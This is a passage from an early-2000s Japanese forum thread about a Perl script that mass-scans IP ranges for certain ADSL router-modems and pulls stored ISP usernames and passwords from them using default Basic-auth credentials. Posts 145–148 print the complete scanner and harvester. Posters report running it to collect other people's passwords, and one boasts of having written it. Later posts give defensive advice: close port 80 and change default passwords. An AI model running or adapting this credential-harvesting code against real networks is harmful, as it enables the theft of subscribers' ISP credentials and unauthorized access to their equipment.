ALLIS/FOS搭載ルータ(NEC IP45/025、Fujikura FNX0550)でWWWインタフェースへ
外部からアクセス可能にしている場合にパスワードを取得してみたり、Apache 1.1.3に
Basicset.cgiが存在している場合にidとパスワードを取得してみたりしてますな。
しかし、「ルータのWWWインタフェースに外部からアクセス可能」なんて普通やるか?
Basicset.cgiなんてCGIプログラムも知らないし。つか1.1.3って古すぎ…
139:138
02/01/12 14:45
>>138
> しかし、「ルータのWWWインタフェースに外部からアクセス可能」なんて普通やるか?
てゆーか、それを防ぐのが広義のファイアウォールというかルータの
パケットフィルタリングでしょう。
フィルタ設定していないなら「ファイアウォール設置した」なんて言えないし。
もすこし現実的なシチュエーションでパス抜けるプログラム希望。
140:名無しさん@お腹いっぱい。
02/01/12 15:21
>>138
>しかし、「ルータのWWWインタフェースに外部からアクセス可能」なんて普通やるか?
PPPoAタイプのモデム&ルーターはデフォルト設定で外部から許可されている場合が多いよ。
たぶん、いざというときにプロバイダーがリモート管理できるようにとの配慮だと思われます。
Netmeetingをするために友達のモデムの設定を外部から設定してあげたことがあります。
だれか実行したやつは居ないのか?
報告きぼーーん。
141:名無しさん@お腹いっぱい。
02/01/12 18:32
NECのルーターにWWWインターフェースなんてあったっけ?
142:138
02/01/12 19:51
>>141
取説を見る限り、NECのルータにはなさそう。
URLリンク(ccsd.biglobe.ne.jp)
勘違いだった。スマソ
143:人柱
02/01/13 02:43
>>140
実行してみました。
なんだかADSLモデムに設定してあると思われるプロバイダのパスワードが
ざくざくでてきました。
まぢでやべーよ。このスクリプト。
144:名無しさん@お腹いっぱい。
02/01/13 03:33
>>124
"マルチスレッドで"ってプロセス生成しまくっただけで、マルチスレッドかよ!
そんなに言うならもう少し"まし"なプログラム組めば?
こんなんじゃ、厨房なの以外釣れないし。
ソース出てきたから期待してたけど、本物なんてそう簡単にいるわけないか・・・
145:Indent
02/01/13 03:48
if ( $ARGV[0]=~/(\d+)\.(\d+)\.(\d+)\.(\d+)\/?(\d*)/ ) {
$ip[0]=$1;
$ip[1]=$2;
$ip[2]=$3;
$ip[3]=$4;
$m = ($5>=16) ? $5 : 24;
$c=2**(32-$m);
if ($m<24) {
$ip[3]=0;
$ip[2]=int($ip[2]*256/$c)*$c/256;
}
elsif ($m>=24) {
$ip[3]=int($ip[3]/$c)*$c;
}
}
else {
print "example: hack.pl 61.210.6.0/24\n";
exit;
}
$|=1;
$SIG{'ALRM'}='kill';
for ($i=1;$i<=$c;$i++){
$pid=fork;
if ($pid==0) {
alarm 3;
&ip;
exit;
}
push(@pida,$pid);
unless ($i%64) {
sleep 1;
if($#pida>=255){
foreach $j (1..64){
waitpid(shift(@pida),1);
}
}
}
$ip[3]++;
if ($ip[3]==256) {
$ip[2]++;
$ip[3]=0;
}
}
waitpid(shift(@pida),1) while ($#pida >= 0);
sleep 1;
print STDERR "\n";
146:Indent2
02/01/13 03:58
sub ip {
$ipstr="$ip[0].$ip[1].$ip[2].$ip[3]";
$addr=pack('CCCC',$ip[0],$ip[1],$ip[2],$ip[3]);
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6);
bind(S,$this);
unless (connect(S,$that)) {
print STDERR "$ipstr...refused \r";return;
}
$fh=select(S);
$|=1;
select($fh);
print S "GET / HTTP/1.0\r\n\r\n";
while (<S>) {
$server=$1
if (/^Server: ([^\r\n]*)/);
$au=$1
if (/^WWW-Authenticate: Basic realm="(\w*)"/);
}
close(S);
147:Indent3
02/01/13 03:59
unless (
($server=~/^ALLIS\/FOS/ && $au eq 'user')
|| ($server=~/^Apache\/1\.1\.3$/ && $au eq 'Config')
)
{
print "$ipstr...failed1 ($server)\n";
return;
}
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6);
bind(S,$this);
connect(S,$that)||return;
$fh=select(S);
$|=1;
select($fh);
148:Indent4
02/01/13 03:59
print S "GET /easy HTTP/1.0\r\nAuthorization: Basic Y29uZmlnOg==\r\n\r\n";
while (<S>) {
if (/NAME="PA_LOG"/) {
/VALUE="([^"]+)"/;
$id=$1;
$suc++;
}
if (/NAME="PA_PS"/) {
/VALUE="([^"]+)"/;
$pass=$1;
$suc++;
}
}
if ($server=~/^ALLIS\/FOS/);
print S "GET /cgi-bin/Basicset.cgi?basic_num=1&reloadmenu=1 HTTP/1.0\r\nAuthorization: Basic cm9vdDpyb290\r\n\r\n";
while (<S>) {
if (/NAME="send_id"/) {
/VALUE="([^"]+)"/;
$id=$1;
$suc++;
}
if (/NAME="send_passwd"/) {
/VALUE="([^"]+)"/;
$pass=$1;
$suc++;
}
}
if ($server=~/^Apache\/1\.1\.3$/);
if ($suc==2) {
print "$ipstr...ID: $id, Password: $pass ($server)\n";
} ;else {
print "$ipstr...failed2 ($server)\n";
}
}
sub kill { exit;}
149:名無しさん@お腹いっぱい。
02/01/14 16:58
>>138
某有名なADSLルータが返してくるのが Server: Apache/1.1.3 。
だから別に本当のApacheを相手にしているわけじゃないな。
プロバイダからの説明書にはユーザ名とパスワードの設定方法ぐらいしか載ってないから
そのままつなげている人のパスワードはばればれ。
さすがに最近のファームウェアではパスワードを取得することはできなくなっているけどね。
まあ、実行してみたらわかると思うけど、かなり危険なスクリプトだよ。
150:149
02/01/14 16:59
スマソ。警告ageのつもりがsageてしまった。
151:人柱
02/01/14 17:08
Server: Apache/1.1.3って返すことは、本物のApacheが入っているのか、
フェイクの為に返しているっていうどちらだろ。
ルータータイプのADSLモデムって、
モデムにユーザー名とパスワードを保存するので危ないネ!
おかげで、オレはたっぷりパスワードを保存出来たがね。
152:138
02/01/14 18:08
>>149
ガーン、そうだったのか…私が無知でした。
つーことは、>>140の話とあわせると結構面白いことができるのか。
>>105のいう
> FireWollがあっても、パスを奪取できるハッキングプログラム
とは少し違う気がするが、オリジナルだとしたらただのハッタリじゃないと
いうことか。
153:名無しさん@お腹いっぱい。
02/01/14 20:26
ウィルスに感染し何気なく再起動してしまった哀れな153は逝って参ります。
154:名無しさん@お腹いっぱい。
02/01/14 20:28
本物だったら面白いな。
155:あぼーん
あぼーん
あぼーん
156:良識人
02/01/16 01:30
さすがにパスをそのまんま公開したらまずいっしょ。
いつまでこのスレは残るんだろうね。
157:名無しさん@お腹いっぱい。
02/01/16 16:50
age
158:良識人
02/01/16 16:58
まじでやばいね。
また、タイーホ者がでるのかな。
どきどき。
159:名無しさん@お腹いっぱい。
02/01/16 23:56
age
160:名無しさん@お腹いっぱい。
02/01/17 01:05
>>54
ネタか?
それは閉じたらダメだよ。
そのうち繋がらなくなる。
161:名無しさん@お腹いっぱい。
02/01/18 08:24
age
162:名無しさん@お腹いっぱい。
02/02/05 00:40
∧∧∧ [ヽ / ̄ ̄ ̄ ̄ ̄ ̄
( `.∀.´) D < 通報しますた。
/ \[丿∂ \______
_ | | | / ∂
|\ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ ∂ ┌ ┐
./..\\ \ .< ◎ >____ _ _ _
/ \|=================|
\ ノ \
\ .\
\ ..\
163:名無しさん@お腹いっぱい。
02/02/05 02:13
タイーホ
164:
02/02/05 12:46
あげ
165:名無しさん@お腹いっぱい。
02/02/06 00:38
age
166:名無しさん@お腹いっぱい。
02/02/06 16:25
167:名無しさん@お腹いっぱい。
02/02/06 17:15
あげ
168:名無しさん@お腹いっぱい。
02/02/07 03:38
>>128 の真中exampleの後のip を変えたらいいのかな。俺はスクリプト全然わかんないんで。こいつで、自分の鯖のセキュリティ試してみたいんだけど。
169:名無しさん@お腹いっぱい。
02/02/07 11:38
>>168
コマンドラインにターゲットのIPアドレスを指定するだけでよさげ。
170:名無しさん@お腹いっぱい。
02/02/07 18:55
>>168-169
外部から見られるかどうかが問題なんじゃないの?
内側から検証してもあんまり意味ないと思うが。
ところで、あのプログラムで設置盗まれるのは、具体的
にはどういう人達なの? 部外者なので、よーわからん。
171:169
02/02/08 11:45
>>170
外部から自分のグローバルIPアドレスにアクセスすればいいんじゃない?
シェル開放してるサーバ使うとか、CGIに仕立てるとか。
> ところで、あのプログラムで設置盗まれるのは、具体的
> にはどういう人達なの? 部外者なので、よーわからん。
>>128のスクリプト先頭にあるコメントを参照。
155であぼーんされたのも、ADSLで上記プロバイダを使ってる人のパスとかだった。
172:170
02/02/08 14:38
>>171
いや、Nifty の ADSL 利用者が対象だって事くらいは、
わかってます。フレッツなのかその他のホールセール業
者なのか、がわからないんです。イーアクセスの8Mレン
タルモデムが対象ではなさそうなのは、自分で持ってる
ので分かるんですが。
安全性のチェックは、適当な proxy server で自分のグ
ローバルIPアドレスのwwwポートにアクセスするか、ポー
トスキャンしてくれるサイトを利用するかすればいいで
すね。
内容をチェックせずに、あんな怪しいプログラムを動か
すのは危険です。
(内容が分かってれば動かす必要が無いのも分かるはず)
173:ニフ使ってマス。
02/02/09 21:09
そんなにニフはヤバいんでしょうか??
どういう対策が必要なんでしょう・・・
何かニフやめたくなってきた。
174:Japanese Tea
02/02/17 16:04
フフフ
オレが本物だってことが分かったかな。>ALL
>>172のバカ
フレッツなのかその他のホールセール業者なのかは特に関係ないぞ。
キヒヒ
基本的に複数の特定モデムをねらい打ちだからな
ちょっとヒントをやろう。
1NECモデムはPPPoEではなくPPPoAで使うときのみDHCPルーターとして働くが、
グローバルIPはモデムに割り振られる。
2フレッツでレンタルのルータータイプのモデムは、
プライベートIPしか使わないので、外部から接続不可能。
このへんが理解できればもう少しわかるかもな。
まぁバカにゃわからんだろうがな。ケケケケケ
175:ななしさん
02/02/17 22:02
プロセスとスレッドの違いも分からん奴が
本物とか言ってもなぁ。
まぁ、本物のアホには違いないが。
176:名無しさん@お腹いっぱい。
02/02/18 09:25
詰め込め詰め込め
177:名無しさん@お腹いっぱい。
02/02/18 09:51
所詮コピペ厨
本物(プ
178:名無しさん@お腹いっぱい。
02/02/18 10:30
tiny&Zone&ICE&Nortonですが何か?
179:178
02/02/18 10:31
そしてルーター。これ最強。
チョットメンドー
180:名無しさん@お腹いっぱい。
02/02/18 16:20
>>178
残念ながら、TinyもZoneもICEもNortonも>>128-130のスクリプトを防げない。
なぜなら、このスクリプトはマシンでなくADSLモデムを対象にしているから。
ルータも無意味…なんだけど、わざわざルータを別に持っているということは
ADSLモデムはルータモードではないわけで、その意味ではこのスクリプトの
影響は受けないかも。
IDSやFWを多重にインストールしている点については…確かに1つの製品では
防げない部分を他でカバーできるかもしれないけど、DoSに弱くなる気もする。
181:180
02/02/18 16:37
あ、>>128-130の話じゃなくてスレの本題か。スマソ
182:名無しさん@お腹いっぱい。
02/02/18 18:29
ルータでWWWポートをステルスにしてると大丈夫ですよね?
183:172
02/02/19 15:01
>>174
>フレッツなのかその他のホールセール業者なのかは特に関係ないぞ。
ADSL 8Mはレンタル主流。NTT西のフレッツなんかは特定
機種買い取りのみだから、関係ありまくりだろう。
まあ、かなーり狭い範囲らしい事はなんとなくわかった。
とりあえず、ありがとさん。
ついでに、いらぬお世話かも知れんが、あのperlスクリ
プト、何の自慢にもならんよ。
184:age
02/02/28 04:35
警告age
185:age
02/02/28 19:55
警告age
>>174
>基本的に複数の特定モデムをねらい打ちだからな
>
>ちょっとヒントをやろう。
>1NECモデムはPPPoEではなくPPPoAで使うときのみDHCPルーターとして働くが、
>グローバルIPはモデムに割り振られる。
>2フレッツでレンタルのルータータイプのモデムは、
>プライベートIPしか使わないので、外部から接続不可能。
186:名無しさん@お腹いっぱい。
02/03/01 00:04
>>182
ルータよりモデムがWAN側にあるんだろ?
外からモデムへのアクセスをルータでどうやってフィルタするんだよ。
ネタ?
187:名無しさん@お腹いっぱい。
02/03/01 02:42
要するにAccaのルータモデム用か。
188:名無しさん@お腹いっぱい。
02/03/01 07:57
>>182
ネタかもしれんがマジレス
「ルータモデムのWAN側のWWWポートをステルス」してれば大丈夫
モデムに繋いだ別のルータでステルスしてもルータモデムは外から丸見え
189:名無しさん@お腹いっぱい。
02/03/01 15:39
>>186 >>188
ルータモデムにルータを繋げるという発想がよくわからん。
それもネタなのか?
>>182
とりあえずSecurityScanサービスやってるサイトへ行ってチェックしなさい。
Port80が閉じてればこのスクリプト何も出来ない。
190:名無しさん@お腹いっぱい。
02/03/01 17:40
>>189
>>182がルータと書いてるのを素直に受け取ったよ。ルータモデムの
機能が不充分なら別のルータやゲートも使うと思うのはそんなに変か?
>>182はそんな事してないかもしれんが・・・
191:189
02/03/01 18:02
>>190
>ルータモデムの機能が不充分なら別のルータやゲートも使う
その可能性もあるね。
でも>>182がそんな芸当が出来るユーザーならこんなところにこんな質問しないだろう、と思っただけ。
「ブリッジモデム+ルータ」 or 「ルータモデム単体」 と考えるのが妥当だろうと…。
喧嘩を売っているわけではないので、気を悪くしたらスマソ。
今回Japanese TeaがFirewall「ソフト」の存在に関係なく動作するスクリプトをコピペ紹介してくれたことは、
Firewall「ソフト」さえ入れておけば安全と思い込んでいる素人さんへの良い警鐘になったのでは?
最低でも
・Port80を閉じる
・ベーシック認証のパスワードはデフォルトのものから変えておく
ぐらいはしなさいと、老婆心ながら強く訴えたい。
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5382日前に更新/98 KB
担当:undef